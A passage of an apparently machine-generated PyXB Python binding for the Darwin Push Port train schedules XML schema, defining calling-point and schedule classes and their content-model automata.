    __ptd = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'ptd'), 'ptd', '__httpwww_thalesgroup_comrttiPushPortSchedulesv1_DT_ptd', _ImportedBinding_darwinpush_xb_ct.RTTITimeType)
    __ptd._DeclarationLocation = pyxb.utils.utility.Location('/home/gberg/code/src/fstr/darwinpush/xsd/rttiPPTSchedules_v1.xsd', 110, 2)
    __ptd._UseLocation = pyxb.utils.utility.Location('/home/gberg/code/src/fstr/darwinpush/xsd/rttiPPTSchedules_v1.xsd', 110, 2)
    ptd = property(__ptd.value, __ptd.set, None, 'Public Scheduled Time of Departure')
    # Attribute wta uses Python identifier wta
    __wta = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'wta'), 'wta', '__httpwww_thalesgroup_comrttiPushPortSchedulesv1_DT_wta', _ImportedBinding_darwinpush_xb_ct.WTimeType, required=True)
    __wta._DeclarationLocation = pyxb.utils.utility.Location('/home/gberg/code/src/fstr/darwinpush/xsd/rttiPPTSchedules_v1.xsd', 224, 2)
    __wta._UseLocation = pyxb.utils.utility.Location('/home/gberg/code/src/fstr/darwinpush/xsd/rttiPPTSchedules_v1.xsd', 224, 2)
    wta = property(__wta.value, __wta.set, None, 'Working Scheduled Time of Arrival')
    # Attribute wtd uses Python identifier wtd
    __wtd = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'wtd'), 'wtd', '__httpwww_thalesgroup_comrttiPushPortSchedulesv1_DT_wtd', _ImportedBinding_darwinpush_xb_ct.WTimeType)
    __wtd._DeclarationLocation = pyxb.utils.utility.Location('/home/gberg/code/src/fstr/darwinpush/xsd/rttiPPTSchedules_v1.xsd', 229, 2)
    __wtd._UseLocation = pyxb.utils.utility.Location('/home/gberg/code/src/fstr/darwinpush/xsd/rttiPPTSchedules_v1.xsd', 229, 2)
    wtd = property(__wtd.value, __wtd.set, None, 'Working Scheduled Time of Departure')
    # Attribute rdelay uses Python identifier rdelay
    __rdelay = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'rdelay'), 'rdelay', '__httpwww_thalesgroup_comrttiPushPortSchedulesv1_DT_rdelay', _ImportedBinding_darwinpush_xb_ct.DelayValueType, unicode_default='0')
    __rdelay._DeclarationLocation = pyxb.utils.utility.Location('/home/gberg/code/src/fstr/darwinpush/xsd/rttiPPTSchedules_v1.xsd', 234, 2)
    __rdelay._UseLocation = pyxb.utils.utility.Location('/home/gberg/code/src/fstr/darwinpush/xsd/rttiPPTSchedules_v1.xsd', 234, 2)
    rdelay = property(__rdelay.value, __rdelay.set, None, "A delay value that is implied by a change to the service's route. This value has been added to the forecast lateness of the service at the previous schedule location when calculating the expected lateness of arrival at this location.")
    # Empty content model: no child elements, attributes only.
    _ElementMap.update({
    })
    _AttributeMap.update({
        __tpl.name() : __tpl,
        __act.name() : __act,
        __planAct.name() : __planAct,
        __can.name() : __can,
        __pta.name() : __pta,
        __ptd.name() : __ptd,
        __wta.name() : __wta,
        __wtd.name() : __wtd,
        __rdelay.name() : __rdelay
    })
# Register the binding so the namespace can resolve the 'DT' type by name.
Namespace.addCategoryObject('typeBinding', 'DT', DT)
# Complex type {http://www.thalesgroup.com/rtti/PushPort/Schedules/v1}OPDT with content type EMPTY
# NOTE(review): machine-generated PyXB binding — regenerate from the XSD rather
# than hand-editing. Operational variant of DT: no public pta/ptd attributes.
class OPDT (pyxb.binding.basis.complexTypeDefinition):
    """Defines an Operational Destination Calling point"""
    _TypeDefinition = None
    _ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_EMPTY
    _Abstract = False
    _ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'OPDT')
    _XSDLocation = pyxb.utils.utility.Location('/home/gberg/code/src/fstr/darwinpush/xsd/rttiPPTSchedules_v1.xsd', 240, 1)
    _ElementMap = {}
    _AttributeMap = {}
    # Base type is pyxb.binding.datatypes.anyType
    # Attribute tpl uses Python identifier tpl
    __tpl = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'tpl'), 'tpl', '__httpwww_thalesgroup_comrttiPushPortSchedulesv1_OPDT_tpl', _ImportedBinding_darwinpush_xb_ct.TiplocType, required=True)
    __tpl._DeclarationLocation = pyxb.utils.utility.Location('/home/gberg/code/src/fstr/darwinpush/xsd/rttiPPTSchedules_v1.xsd', 80, 2)
    __tpl._UseLocation = pyxb.utils.utility.Location('/home/gberg/code/src/fstr/darwinpush/xsd/rttiPPTSchedules_v1.xsd', 80, 2)
    tpl = property(__tpl.value, __tpl.set, None, 'TIPLOC')
    # Attribute act uses Python identifier act
    __act = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'act'), 'act', '__httpwww_thalesgroup_comrttiPushPortSchedulesv1_OPDT_act', _ImportedBinding_darwinpush_xb_ct.ActivityType, unicode_default=' ')
    __act._DeclarationLocation = pyxb.utils.utility.Location('/home/gberg/code/src/fstr/darwinpush/xsd/rttiPPTSchedules_v1.xsd', 85, 2)
    __act._UseLocation = pyxb.utils.utility.Location('/home/gberg/code/src/fstr/darwinpush/xsd/rttiPPTSchedules_v1.xsd', 85, 2)
    act = property(__act.value, __act.set, None, 'Current Activity Codes')
    # Attribute planAct uses Python identifier planAct
    __planAct = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'planAct'), 'planAct', '__httpwww_thalesgroup_comrttiPushPortSchedulesv1_OPDT_planAct', _ImportedBinding_darwinpush_xb_ct.ActivityType)
    __planAct._DeclarationLocation = pyxb.utils.utility.Location('/home/gberg/code/src/fstr/darwinpush/xsd/rttiPPTSchedules_v1.xsd', 90, 2)
    __planAct._UseLocation = pyxb.utils.utility.Location('/home/gberg/code/src/fstr/darwinpush/xsd/rttiPPTSchedules_v1.xsd', 90, 2)
    planAct = property(__planAct.value, __planAct.set, None, 'Planned Activity Codes (if different to current activities)')
    # Attribute can uses Python identifier can
    __can = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'can'), 'can', '__httpwww_thalesgroup_comrttiPushPortSchedulesv1_OPDT_can', pyxb.binding.datatypes.boolean, unicode_default='false')
    __can._DeclarationLocation = pyxb.utils.utility.Location('/home/gberg/code/src/fstr/darwinpush/xsd/rttiPPTSchedules_v1.xsd', 95, 2)
    __can._UseLocation = pyxb.utils.utility.Location('/home/gberg/code/src/fstr/darwinpush/xsd/rttiPPTSchedules_v1.xsd', 95, 2)
    can = property(__can.value, __can.set, None, 'Cancelled')
    # Attribute wta uses Python identifier wta
    __wta = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'wta'), 'wta', '__httpwww_thalesgroup_comrttiPushPortSchedulesv1_OPDT_wta', _ImportedBinding_darwinpush_xb_ct.WTimeType, required=True)
    __wta._DeclarationLocation = pyxb.utils.utility.Location('/home/gberg/code/src/fstr/darwinpush/xsd/rttiPPTSchedules_v1.xsd', 245, 2)
    __wta._UseLocation = pyxb.utils.utility.Location('/home/gberg/code/src/fstr/darwinpush/xsd/rttiPPTSchedules_v1.xsd', 245, 2)
    wta = property(__wta.value, __wta.set, None, 'Working Scheduled Time of Arrival')
    # Attribute wtd uses Python identifier wtd
    __wtd = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'wtd'), 'wtd', '__httpwww_thalesgroup_comrttiPushPortSchedulesv1_OPDT_wtd', _ImportedBinding_darwinpush_xb_ct.WTimeType)
    __wtd._DeclarationLocation = pyxb.utils.utility.Location('/home/gberg/code/src/fstr/darwinpush/xsd/rttiPPTSchedules_v1.xsd', 250, 2)
    __wtd._UseLocation = pyxb.utils.utility.Location('/home/gberg/code/src/fstr/darwinpush/xsd/rttiPPTSchedules_v1.xsd', 250, 2)
    wtd = property(__wtd.value, __wtd.set, None, 'Working Scheduled Time of Departure')
    # Attribute rdelay uses Python identifier rdelay
    __rdelay = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'rdelay'), 'rdelay', '__httpwww_thalesgroup_comrttiPushPortSchedulesv1_OPDT_rdelay', _ImportedBinding_darwinpush_xb_ct.DelayValueType, unicode_default='0')
    __rdelay._DeclarationLocation = pyxb.utils.utility.Location('/home/gberg/code/src/fstr/darwinpush/xsd/rttiPPTSchedules_v1.xsd', 255, 2)
    __rdelay._UseLocation = pyxb.utils.utility.Location('/home/gberg/code/src/fstr/darwinpush/xsd/rttiPPTSchedules_v1.xsd', 255, 2)
    rdelay = property(__rdelay.value, __rdelay.set, None, "A delay value that is implied by a change to the service's route. This value has been added to the forecast lateness of the service at the previous schedule location when calculating the expected lateness of arrival at this location.")
    # Empty content model: no child elements, attributes only.
    _ElementMap.update({
    })
    _AttributeMap.update({
        __tpl.name() : __tpl,
        __act.name() : __act,
        __planAct.name() : __planAct,
        __can.name() : __can,
        __wta.name() : __wta,
        __wtd.name() : __wtd,
        __rdelay.name() : __rdelay
    })
# Register the binding so the namespace can resolve the 'OPDT' type by name.
Namespace.addCategoryObject('typeBinding', 'OPDT', OPDT)
# Complex type {http://www.thalesgroup.com/rtti/PushPort/Schedules/v1}Schedule with content type ELEMENT_ONLY
# NOTE(review): machine-generated PyXB binding — regenerate from the XSD rather
# than hand-editing. Child calling-point elements (OR/OPOR/IP/OPIP/PP/DT/OPDT)
# are declared here; their concrete bindings are attached by the
# Schedule._AddElement calls later in this module, and the content-model
# automaton is built by _BuildAutomaton_.
class Schedule (pyxb.binding.basis.complexTypeDefinition):
    """Train Schedule"""
    _TypeDefinition = None
    _ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_ELEMENT_ONLY
    _Abstract = False
    _ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'Schedule')
    _XSDLocation = pyxb.utils.utility.Location('/home/gberg/code/src/fstr/darwinpush/xsd/rttiPPTSchedules_v1.xsd', 261, 1)
    _ElementMap = {}
    _AttributeMap = {}
    # Base type is pyxb.binding.datatypes.anyType
    # Element {http://www.thalesgroup.com/rtti/PushPort/Schedules/v1}OR uses Python identifier OR
    __OR = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'OR'), 'OR', '__httpwww_thalesgroup_comrttiPushPortSchedulesv1_Schedule_httpwww_thalesgroup_comrttiPushPortSchedulesv1OR', True, pyxb.utils.utility.Location('/home/gberg/code/src/fstr/darwinpush/xsd/rttiPPTSchedules_v1.xsd', 267, 4), )
    OR = property(__OR.value, __OR.set, None, None)
    # Element {http://www.thalesgroup.com/rtti/PushPort/Schedules/v1}OPOR uses Python identifier OPOR
    __OPOR = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'OPOR'), 'OPOR', '__httpwww_thalesgroup_comrttiPushPortSchedulesv1_Schedule_httpwww_thalesgroup_comrttiPushPortSchedulesv1OPOR', True, pyxb.utils.utility.Location('/home/gberg/code/src/fstr/darwinpush/xsd/rttiPPTSchedules_v1.xsd', 268, 4), )
    OPOR = property(__OPOR.value, __OPOR.set, None, None)
    # Element {http://www.thalesgroup.com/rtti/PushPort/Schedules/v1}IP uses Python identifier IP
    __IP = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'IP'), 'IP', '__httpwww_thalesgroup_comrttiPushPortSchedulesv1_Schedule_httpwww_thalesgroup_comrttiPushPortSchedulesv1IP', True, pyxb.utils.utility.Location('/home/gberg/code/src/fstr/darwinpush/xsd/rttiPPTSchedules_v1.xsd', 269, 4), )
    IP = property(__IP.value, __IP.set, None, None)
    # Element {http://www.thalesgroup.com/rtti/PushPort/Schedules/v1}OPIP uses Python identifier OPIP
    __OPIP = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'OPIP'), 'OPIP', '__httpwww_thalesgroup_comrttiPushPortSchedulesv1_Schedule_httpwww_thalesgroup_comrttiPushPortSchedulesv1OPIP', True, pyxb.utils.utility.Location('/home/gberg/code/src/fstr/darwinpush/xsd/rttiPPTSchedules_v1.xsd', 270, 4), )
    OPIP = property(__OPIP.value, __OPIP.set, None, None)
    # Element {http://www.thalesgroup.com/rtti/PushPort/Schedules/v1}PP uses Python identifier PP
    __PP = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'PP'), 'PP', '__httpwww_thalesgroup_comrttiPushPortSchedulesv1_Schedule_httpwww_thalesgroup_comrttiPushPortSchedulesv1PP', True, pyxb.utils.utility.Location('/home/gberg/code/src/fstr/darwinpush/xsd/rttiPPTSchedules_v1.xsd', 271, 4), )
    PP = property(__PP.value, __PP.set, None, None)
    # Element {http://www.thalesgroup.com/rtti/PushPort/Schedules/v1}DT uses Python identifier DT
    __DT = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'DT'), 'DT', '__httpwww_thalesgroup_comrttiPushPortSchedulesv1_Schedule_httpwww_thalesgroup_comrttiPushPortSchedulesv1DT', True, pyxb.utils.utility.Location('/home/gberg/code/src/fstr/darwinpush/xsd/rttiPPTSchedules_v1.xsd', 272, 4), )
    DT = property(__DT.value, __DT.set, None, None)
    # Element {http://www.thalesgroup.com/rtti/PushPort/Schedules/v1}OPDT uses Python identifier OPDT
    __OPDT = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'OPDT'), 'OPDT', '__httpwww_thalesgroup_comrttiPushPortSchedulesv1_Schedule_httpwww_thalesgroup_comrttiPushPortSchedulesv1OPDT', True, pyxb.utils.utility.Location('/home/gberg/code/src/fstr/darwinpush/xsd/rttiPPTSchedules_v1.xsd', 273, 4), )
    OPDT = property(__OPDT.value, __OPDT.set, None, None)
    # Element {http://www.thalesgroup.com/rtti/PushPort/Schedules/v1}cancelReason uses Python identifier cancelReason
    __cancelReason = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'cancelReason'), 'cancelReason', '__httpwww_thalesgroup_comrttiPushPortSchedulesv1_Schedule_httpwww_thalesgroup_comrttiPushPortSchedulesv1cancelReason', False, pyxb.utils.utility.Location('/home/gberg/code/src/fstr/darwinpush/xsd/rttiPPTSchedules_v1.xsd', 275, 3), )
    cancelReason = property(__cancelReason.value, __cancelReason.set, None, None)
    # Attribute rid uses Python identifier rid
    __rid = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'rid'), 'rid', '__httpwww_thalesgroup_comrttiPushPortSchedulesv1_Schedule_rid', _ImportedBinding_darwinpush_xb_ct.RIDType, required=True)
    __rid._DeclarationLocation = pyxb.utils.utility.Location('/home/gberg/code/src/fstr/darwinpush/xsd/rttiPPTSchedules_v1.xsd', 277, 2)
    __rid._UseLocation = pyxb.utils.utility.Location('/home/gberg/code/src/fstr/darwinpush/xsd/rttiPPTSchedules_v1.xsd', 277, 2)
    rid = property(__rid.value, __rid.set, None, 'RTTI unique Train ID')
    # Attribute uid uses Python identifier uid
    __uid = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'uid'), 'uid', '__httpwww_thalesgroup_comrttiPushPortSchedulesv1_Schedule_uid', _ImportedBinding_darwinpush_xb_ct.UIDType, required=True)
    __uid._DeclarationLocation = pyxb.utils.utility.Location('/home/gberg/code/src/fstr/darwinpush/xsd/rttiPPTSchedules_v1.xsd', 282, 2)
    __uid._UseLocation = pyxb.utils.utility.Location('/home/gberg/code/src/fstr/darwinpush/xsd/rttiPPTSchedules_v1.xsd', 282, 2)
    uid = property(__uid.value, __uid.set, None, 'Train UID')
    # Attribute trainId uses Python identifier trainId
    __trainId = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'trainId'), 'trainId', '__httpwww_thalesgroup_comrttiPushPortSchedulesv1_Schedule_trainId', _ImportedBinding_darwinpush_xb_ct.TrainIdType, required=True)
    __trainId._DeclarationLocation = pyxb.utils.utility.Location('/home/gberg/code/src/fstr/darwinpush/xsd/rttiPPTSchedules_v1.xsd', 287, 2)
    __trainId._UseLocation = pyxb.utils.utility.Location('/home/gberg/code/src/fstr/darwinpush/xsd/rttiPPTSchedules_v1.xsd', 287, 2)
    trainId = property(__trainId.value, __trainId.set, None, 'Train ID (Headcode)')
    # Attribute ssd uses Python identifier ssd
    __ssd = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'ssd'), 'ssd', '__httpwww_thalesgroup_comrttiPushPortSchedulesv1_Schedule_ssd', _ImportedBinding_darwinpush_xb_ct.RTTIDateType, required=True)
    __ssd._DeclarationLocation = pyxb.utils.utility.Location('/home/gberg/code/src/fstr/darwinpush/xsd/rttiPPTSchedules_v1.xsd', 292, 2)
    __ssd._UseLocation = pyxb.utils.utility.Location('/home/gberg/code/src/fstr/darwinpush/xsd/rttiPPTSchedules_v1.xsd', 292, 2)
    ssd = property(__ssd.value, __ssd.set, None, 'Scheduled Start Date')
    # Attribute toc uses Python identifier toc
    __toc = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'toc'), 'toc', '__httpwww_thalesgroup_comrttiPushPortSchedulesv1_Schedule_toc', _ImportedBinding_darwinpush_xb_ct.TOCType, required=True)
    __toc._DeclarationLocation = pyxb.utils.utility.Location('/home/gberg/code/src/fstr/darwinpush/xsd/rttiPPTSchedules_v1.xsd', 297, 2)
    __toc._UseLocation = pyxb.utils.utility.Location('/home/gberg/code/src/fstr/darwinpush/xsd/rttiPPTSchedules_v1.xsd', 297, 2)
    toc = property(__toc.value, __toc.set, None, 'ATOC Code')
    # Attribute status uses Python identifier status
    __status = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'status'), 'status', '__httpwww_thalesgroup_comrttiPushPortSchedulesv1_Schedule_status', _ImportedBinding_darwinpush_xb_ct.CIFTrainStatusType, unicode_default='P')
    __status._DeclarationLocation = pyxb.utils.utility.Location('/home/gberg/code/src/fstr/darwinpush/xsd/rttiPPTSchedules_v1.xsd', 302, 2)
    __status._UseLocation = pyxb.utils.utility.Location('/home/gberg/code/src/fstr/darwinpush/xsd/rttiPPTSchedules_v1.xsd', 302, 2)
    status = property(__status.value, __status.set, None, 'Type of service, i.e. Train/Bus/Ship.')
    # Attribute trainCat uses Python identifier trainCat
    __trainCat = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'trainCat'), 'trainCat', '__httpwww_thalesgroup_comrttiPushPortSchedulesv1_Schedule_trainCat', _ImportedBinding_darwinpush_xb_ct.CIFTrainCategoryType, unicode_default='OO')
    __trainCat._DeclarationLocation = pyxb.utils.utility.Location('/home/gberg/code/src/fstr/darwinpush/xsd/rttiPPTSchedules_v1.xsd', 307, 2)
    __trainCat._UseLocation = pyxb.utils.utility.Location('/home/gberg/code/src/fstr/darwinpush/xsd/rttiPPTSchedules_v1.xsd', 307, 2)
    trainCat = property(__trainCat.value, __trainCat.set, None, 'Category of service.')
    # Attribute isPassengerSvc uses Python identifier isPassengerSvc
    __isPassengerSvc = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'isPassengerSvc'), 'isPassengerSvc', '__httpwww_thalesgroup_comrttiPushPortSchedulesv1_Schedule_isPassengerSvc', pyxb.binding.datatypes.boolean, unicode_default='true')
    __isPassengerSvc._DeclarationLocation = pyxb.utils.utility.Location('/home/gberg/code/src/fstr/darwinpush/xsd/rttiPPTSchedules_v1.xsd', 312, 2)
    __isPassengerSvc._UseLocation = pyxb.utils.utility.Location('/home/gberg/code/src/fstr/darwinpush/xsd/rttiPPTSchedules_v1.xsd', 312, 2)
    isPassengerSvc = property(__isPassengerSvc.value, __isPassengerSvc.set, None, 'True if Darwin classifies the train category as a passenger service.')
    # Attribute isActive uses Python identifier isActive
    __isActive = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'isActive'), 'isActive', '__httpwww_thalesgroup_comrttiPushPortSchedulesv1_Schedule_isActive', pyxb.binding.datatypes.boolean, unicode_default='true')
    __isActive._DeclarationLocation = pyxb.utils.utility.Location('/home/gberg/code/src/fstr/darwinpush/xsd/rttiPPTSchedules_v1.xsd', 317, 2)
    __isActive._UseLocation = pyxb.utils.utility.Location('/home/gberg/code/src/fstr/darwinpush/xsd/rttiPPTSchedules_v1.xsd', 317, 2)
    isActive = property(__isActive.value, __isActive.set, None, 'Indicates if this service is active in Darwin. Note that schedules should be assumed to be inactive until a message is received to indicate otherwise.')
    # Attribute deleted uses Python identifier deleted
    __deleted = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'deleted'), 'deleted', '__httpwww_thalesgroup_comrttiPushPortSchedulesv1_Schedule_deleted', pyxb.binding.datatypes.boolean, unicode_default='false')
    __deleted._DeclarationLocation = pyxb.utils.utility.Location('/home/gberg/code/src/fstr/darwinpush/xsd/rttiPPTSchedules_v1.xsd', 322, 2)
    __deleted._UseLocation = pyxb.utils.utility.Location('/home/gberg/code/src/fstr/darwinpush/xsd/rttiPPTSchedules_v1.xsd', 322, 2)
    deleted = property(__deleted.value, __deleted.set, None, 'Service has been deleted and should not be used/displayed.')
    # Attribute isCharter uses Python identifier isCharter
    __isCharter = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'isCharter'), 'isCharter', '__httpwww_thalesgroup_comrttiPushPortSchedulesv1_Schedule_isCharter', pyxb.binding.datatypes.boolean, unicode_default='false')
    __isCharter._DeclarationLocation = pyxb.utils.utility.Location('/home/gberg/code/src/fstr/darwinpush/xsd/rttiPPTSchedules_v1.xsd', 327, 2)
    __isCharter._UseLocation = pyxb.utils.utility.Location('/home/gberg/code/src/fstr/darwinpush/xsd/rttiPPTSchedules_v1.xsd', 327, 2)
    isCharter = property(__isCharter.value, __isCharter.set, None, 'Indicates if this service is a charter service.')
    _ElementMap.update({
        __OR.name() : __OR,
        __OPOR.name() : __OPOR,
        __IP.name() : __IP,
        __OPIP.name() : __OPIP,
        __PP.name() : __PP,
        __DT.name() : __DT,
        __OPDT.name() : __OPDT,
        __cancelReason.name() : __cancelReason
    })
    _AttributeMap.update({
        __rid.name() : __rid,
        __uid.name() : __uid,
        __trainId.name() : __trainId,
        __ssd.name() : __ssd,
        __toc.name() : __toc,
        __status.name() : __status,
        __trainCat.name() : __trainCat,
        __isPassengerSvc.name() : __isPassengerSvc,
        __isActive.name() : __isActive,
        __deleted.name() : __deleted,
        __isCharter.name() : __isCharter
    })
# Register the binding so the namespace can resolve the 'Schedule' type by name.
Namespace.addCategoryObject('typeBinding', 'Schedule', Schedule)
# Complex type {http://www.thalesgroup.com/rtti/PushPort/Schedules/v1}DeactivatedSchedule with content type EMPTY
# NOTE(review): machine-generated PyXB binding — regenerate from the XSD rather
# than hand-editing. Carries only the required 'rid' attribute.
class DeactivatedSchedule (pyxb.binding.basis.complexTypeDefinition):
    """Notification that a Train Schedule is now deactivated in Darwin."""
    _TypeDefinition = None
    _ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_EMPTY
    _Abstract = False
    _ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'DeactivatedSchedule')
    _XSDLocation = pyxb.utils.utility.Location('/home/gberg/code/src/fstr/darwinpush/xsd/rttiPPTSchedules_v1.xsd', 333, 1)
    _ElementMap = {}
    _AttributeMap = {}
    # Base type is pyxb.binding.datatypes.anyType
    # Attribute rid uses Python identifier rid
    __rid = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(None, 'rid'), 'rid', '__httpwww_thalesgroup_comrttiPushPortSchedulesv1_DeactivatedSchedule_rid', _ImportedBinding_darwinpush_xb_ct.RIDType, required=True)
    __rid._DeclarationLocation = pyxb.utils.utility.Location('/home/gberg/code/src/fstr/darwinpush/xsd/rttiPPTSchedules_v1.xsd', 337, 2)
    __rid._UseLocation = pyxb.utils.utility.Location('/home/gberg/code/src/fstr/darwinpush/xsd/rttiPPTSchedules_v1.xsd', 337, 2)
    rid = property(__rid.value, __rid.set, None, 'RTTI unique Train ID')
    # Empty content model: no child elements, single attribute only.
    _ElementMap.update({
    })
    _AttributeMap.update({
        __rid.name() : __rid
    })
# Register the binding so the namespace can resolve the type by name.
Namespace.addCategoryObject('typeBinding', 'DeactivatedSchedule', DeactivatedSchedule)
# Attach the two child element bindings to the Association complex type
# (both are of type AssocService); the content-model automaton that orders
# them is built by _BuildAutomaton below.
Association._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'main'), AssocService, scope=Association, documentation='The through, previous working or link-to service', location=pyxb.utils.utility.Location('/home/gberg/code/src/fstr/darwinpush/xsd/rttiPPTSchedules_v1.xsd', 44, 3)))
Association._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'assoc'), AssocService, scope=Association, documentation='The starting, terminating, subsequent working or link-from service', location=pyxb.utils.utility.Location('/home/gberg/code/src/fstr/darwinpush/xsd/rttiPPTSchedules_v1.xsd', 49, 3)))
def _BuildAutomaton ():
    """Build the finite-automaton content model for Association.

    The model is a fixed two-element sequence: 'main' followed by 'assoc'.
    Only the 'assoc' state is accepting, so both children are required.
    """
    # Self-destruct: this helper is invoked exactly once (immediately below)
    # and then removed from the module namespace.
    global _BuildAutomaton
    del _BuildAutomaton
    import pyxb.utils.fac as fac

    # State for the leading 'main' element; not accepting (final_update=None).
    main_symbol = pyxb.binding.content.ElementUse(Association._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'main')), pyxb.utils.utility.Location('/home/gberg/code/src/fstr/darwinpush/xsd/rttiPPTSchedules_v1.xsd', 44, 3))
    main_state = fac.State(main_symbol, is_initial=True, final_update=None, is_unordered_catenation=False)

    # State for the trailing 'assoc' element; accepting (empty update set).
    assoc_symbol = pyxb.binding.content.ElementUse(Association._UseForTag(pyxb.namespace.ExpandedName(Namespace, 'assoc')), pyxb.utils.utility.Location('/home/gberg/code/src/fstr/darwinpush/xsd/rttiPPTSchedules_v1.xsd', 49, 3))
    assoc_state = fac.State(assoc_symbol, is_initial=False, final_update=set(), is_unordered_catenation=False)

    # Single transition main -> assoc (no counter updates); assoc is terminal.
    main_state._set_transitionSet([fac.Transition(assoc_state, [])])
    assoc_state._set_transitionSet([])

    return fac.Automaton([main_state, assoc_state], set(), False, containing_state=None)
Association._Automaton = _BuildAutomaton()
# Attach the concrete calling-point bindings (and cancelReason) to the
# Schedule complex type declared earlier; the content-model automaton that
# sequences them is built by _BuildAutomaton_ below.
Schedule._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'OR'), OR, scope=Schedule, location=pyxb.utils.utility.Location('/home/gberg/code/src/fstr/darwinpush/xsd/rttiPPTSchedules_v1.xsd', 267, 4)))
Schedule._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'OPOR'), OPOR, scope=Schedule, location=pyxb.utils.utility.Location('/home/gberg/code/src/fstr/darwinpush/xsd/rttiPPTSchedules_v1.xsd', 268, 4)))
Schedule._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'IP'), IP, scope=Schedule, location=pyxb.utils.utility.Location('/home/gberg/code/src/fstr/darwinpush/xsd/rttiPPTSchedules_v1.xsd', 269, 4)))
Schedule._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'OPIP'), OPIP, scope=Schedule, location=pyxb.utils.utility.Location('/home/gberg/code/src/fstr/darwinpush/xsd/rttiPPTSchedules_v1.xsd', 270, 4)))
Schedule._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'PP'), PP, scope=Schedule, location=pyxb.utils.utility.Location('/home/gberg/code/src/fstr/darwinpush/xsd/rttiPPTSchedules_v1.xsd', 271, 4)))
Schedule._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'DT'), DT, scope=Schedule, location=pyxb.utils.utility.Location('/home/gberg/code/src/fstr/darwinpush/xsd/rttiPPTSchedules_v1.xsd', 272, 4)))
Schedule._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'OPDT'), OPDT, scope=Schedule, location=pyxb.utils.utility.Location('/home/gberg/code/src/fstr/darwinpush/xsd/rttiPPTSchedules_v1.xsd', 273, 4)))
Schedule._AddElement(pyxb.binding.basis.element(pyxb.namespace.ExpandedName(Namespace, 'cancelReason'), _ImportedBinding_darwinpush_xb_ct.DisruptionReasonType, scope=Schedule, location=pyxb.utils.utility.Location('/home/gberg/code/src/fstr/darwinpush/xsd/rttiPPTSchedules_v1.xsd', 275, 3)))
def _BuildAutomaton_ ():
    # Remove this helper function from the namespace after it is invoked
    global _BuildAutomaton_
    del _BuildAutomaton_
    import pyxb.utils.fac as fac

    _SCHEMA = '/home/gberg/code/src/fstr/darwinpush/xsd/rttiPPTSchedules_v1.xsd'

    def _loc (line, col):
        # Every metadata location points into the same schema document.
        return pyxb.utils.utility.Location(_SCHEMA, line, col)

    # cc_0 governs the calling-point group (min=2, unbounded); cc_1 governs
    # the cancelReason element (at most one occurrence).
    cc_0 = fac.CounterCondition(min=2, max=None, metadata=_loc(266, 3))
    cc_1 = fac.CounterCondition(min=0, max=1, metadata=_loc(275, 3))
    counters = set([cc_0, cc_1])

    def _point_state (tag, line):
        # The seven calling-point states are structurally identical: each is
        # an initial state and is final provided cc_0 is satisfied without a
        # further increment.
        use = Schedule._UseForTag(pyxb.namespace.ExpandedName(Namespace, tag))
        symbol = pyxb.binding.content.ElementUse(use, _loc(line, 4))
        return fac.State(symbol, is_initial=True,
                         final_update=set([fac.UpdateInstruction(cc_0, False)]),
                         is_unordered_catenation=False)

    point_specs = (('OR', 267), ('OPOR', 268), ('IP', 269), ('OPIP', 270),
                   ('PP', 271), ('DT', 272), ('OPDT', 273))
    point_states = [_point_state(tag, line) for (tag, line) in point_specs]

